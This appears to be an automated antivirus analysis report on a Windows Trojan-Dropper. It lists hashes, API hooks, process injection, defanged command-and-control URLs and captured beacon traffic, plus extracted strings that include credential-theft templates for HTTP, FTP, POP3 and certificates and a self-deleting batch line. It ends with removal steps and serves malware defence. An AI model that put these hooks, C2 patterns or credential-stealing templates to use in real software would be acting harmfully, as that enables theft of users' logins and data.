MD5: 029173387d9218d9a6260f5fe48a6237
SHA1: 85c9be75497e0a8b2ade83481f5b5dcd4aed29f0
SHA256: e0ed2a54db150527f1f4b1faa25b1e3c02b041f44c4cce1fd0a84f6f7b5b13f2
SSDeep: 3072:A3ILkQxlSxIu0E0IWAcWQNGoK6BkXSfXe1EAH:jlSxxwIHGvqOe1/
Size: 134656 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-11-05 01:29:58
Analyzed on: WindowsXPESX SP3 32-bit

Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2508
KB00904859.exe:2784

The Trojan injects its code into the following process(es):

Explorer.EXE:1948

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2508 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\KB00904859.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\expB2.tmp.bat (190 bytes)

Registry activity

The process %original file name%.exe:2508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process KB00904859.exe:2784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in Secur32.dll:

InitializeSecurityContextA
UnsealMessage
SealMessage
InitializeSecurityContextW
DeleteSecurityContext

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
recv
WSARecv
send
connect
closesocket

The Trojan installs the following user-mode hooks in ntdll.dll:

LdrLoadDll
NtResumeThread

Propagation

VersionInfo

Company Name: Bikmd Vlrip
Product Name: Frwcrzo Anvy Dhmvu
Product Version: 7.18.6938.33642
Legal Copyright: Copyright (c) Bikmd Vlrip
Legal Trademarks:
Original Filename: Frwcrzo.exe
Internal Name: Frwcrzo
File Version: 7.18.6938.33642
File Description: Frwcrzo Zdmuiy Ixryhga Mmgyx
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://31.31.204.59/bgb8LDA/pPyyx/yLrJeD/
hxxp://masterupdate.ru/bgb8LDA/pPyyx/yLrJeD/	31.31.204.59
hxxp://updatecheck.co.ua/bgb8LDA/pPyyx/yLrJeD/

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Spoofed MSIE 7 User-Agent Likely Ponmocup

Traffic

POST /bgb8LDA/pPyyx/yLrJeD/ HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)

Host: masterupdate.ru

Content-Length: 335

Connection: Keep-Alive

Cache-Control: no-cache

..>u*.T.........D.....3..kiW.(s..V.:n..8(R."-Z..J..F../..]..@[|.. ..W1.U...?y..F}..|...*D&..[.....BX.k.,

lo......9p..C...z.T....(.w.D.t....z...$...f.dM.#....0b.Al|.h..b..;CC.e"..p#...!......Ex.d...5..!.2y.1..^&O.I..:.D..<A,... V.*..p....D./..R
..d V./K.Nk.J... ...3cf}

..7^p....VT....:-.._7..q.....{... ...#.....i..x..y..PQ..?....j
HTTP/1.1 404 Not Found

Server: nginx

Date: Wed, 29 Oct 2014 15:41:12 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive
234..<html>..<head><title>404 Not Found</title>
;</head>..<body bgcolor="white">..<center><h1>
404 Not Found</h1></center>..<hr><center>nginx
</center>..</body>..</html>..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
 disable MSIE and Chrome friendly error page -->..<!-- a padding
 to disable MSIE and Chrome friendly error page -->..<!-- a padd
ing to disable MSIE and Chrome friendly error page -->..<!-- a p
adding to disable MSIE and Chrome friendly error page -->..<!-- 
a padding to disable MSIE and Chrome friendly error page -->..0..

POST /bgb8LDA/pPyyx/yLrJeD/ HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)

Host: updatecheck.co.ua

Content-Length: 335

Connection: Keep-Alive

Cache-Control: no-cache

yS.D.....PC..;.*...L.?...0q......C.j..hq.>r........_wPds..?u.^.....L.H.*
..1..?..0.1..*.X....V...RT...E..te....@....~y...........(.w.D.t....z...$..G..l:...Y..O.D...,QO.a.g.U...gk...O...iA.....gIU/!%M.=z.|/.W.~.-X..I.......^.y... U%Q.....u...p\n...K.. .'...5......g(...h:...U@hs...:.H..r...E. k..j..ZM....L.......-Y.}o.S..
[email protected]
HTTP/1.1 404 Not Found

Server: nginx

Date: Wed, 29 Oct 2014 15:41:12 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive
234..<html>..<head><title>404 Not Found</title>
;</head>..<body bgcolor="white">..<center><h1>
404 Not Found</h1></center>..<hr><center>nginx
</center>..</body>..</html>..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
 disable MSIE and Chrome friendly error page -->..<!-- a padding
 to disable MSIE and Chrome friendly error page -->..<!-- a padd
ing to disable MSIE and Chrome friendly error page -->..<!-- a p
adding to disable MSIE and Chrome friendly error page -->..<!-- 
a padding to disable MSIE and Chrome friendly error page -->..0..

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.reloc

SSSShTP

application/x-www-form-urlencoded

<http time="%%%uu"><url><![CDATA[%%.%us]]></url><useragent><![CDATA[%%.%us]]></useragent><data><![CDATA[

]]></data></http>

<httpshot time="%%%uu"><url><![CDATA[%%.%us]]></url><data><![CDATA[

]]></data></httpshot>

<ftp time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server><user><![CDATA[%%.%us]]></user><pass><![CDATA[

]]></pass></ftp>

<pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server><user><![CDATA[%%.%us]]></user><pass><![CDATA[

]]></pass></pop3>

<cmd id="%u">%u</cmd>

<cert time="%u"><pass><![CDATA[

]]></pass><data><![CDATA[

]]></data></cert>

<ie time="%u"><data><![CDATA[

<ff time="%u"><data><![CDATA[

<mm time="%u"><data><![CDATA[

<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u"><header><unique>%%.%us</unique><version>%%u</version><system>%%u</system><network>%%u</network></header><data>

httpshots

httpinjects

%u.%u.%u.%u:%u

crypt32.dll

del /F /Q /A "%S"

if exist "%S" goto R

HTTP/1.0

HTTP/1.1

https

httpinject

HTTP/1.1 200 OK

<div class="d"><a href="/%S">[%S]</a></div>

<div class="f"><a href="/%S">%S</a></div>

Content-Disposition: attachment; filename=%S

cabinet.dll

nss3.dll

ssl3.dll

nspr4.dll

wininet.dll

ws2_32.dll

secur32.dll

kernel32.dll

ntdll.dll

SSL_ImportFD

InternetCrackUrlW

HttpSendRequestExW

HttpQueryInfoA

HttpOpenRequestW

HttpEndRequestW

CryptImportPublicKeyInfo

CertDeleteCertificateFromStore

CertDuplicateCertificateContext

CertEnumCertificatesInStore

CertCloseStore

PFXExportCertStoreEx

CertOpenSystemStoreW

PFXImportCertStore

SHLWAPI.dll

CreatePipe

GetProcessHeap

KERNEL32.dll

CryptExportKey

CryptGenKey

CryptDestroyKey

RegCreateKeyExW

RegOpenKeyExW

RegNotifyChangeKeyValue

RegCloseKey

ADVAPI32.dll

SHELL32.dll

|.^$* ?()[\

4H4d4y4

2"2D2U2

8094989

Software\Microsoft\Windows NT\CX

Mozilla\Firefox\Profiles

chrome.exe

firefox.exe

explorer.exe

Local\XMEX

Local\XMMX

Local\XMIX

NSoftware\Microsoft\Windows\CurrentVersion\Run

ShXXp://renataltd.ru

hXXp://montierco.ru

hXXp://pianiykrolik.ru

hXXp://masterupdate.ru

hXXp://updatecheck.co.ua

Local\XMSX

Local\XMFX

Local\XMRX

Software\Microsoft\Windows NT\SX

sKBd.exe

Local\XMQX

Local\XMBX

"%s" /c "%s"

/c "%s"

Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)

Software\Microsoft\Windows NT\CECEA88B2

%WinDir%\Explorer.EXE

%Documents and Settings%\%current user%\Application Data\EA8B7786\EA8B7786.srv

%Documents and Settings%\%current user%\Application Data\EA8B7786\EA8B7786

%Documents and Settings%\%current user%\Application Data\EA8B7786

Software\Microsoft\Windows NT\SEA8B7786

%Documents and Settings%\%current user%\Application Data\KB00904859.exe

%Documents and Settings%\%current user%\Application Data

KB00904859.exe

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:2508
   KB00904859.exe:2784
   

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Application Data\KB00904859.exe (673 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\expB2.tmp.bat (190 bytes)

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.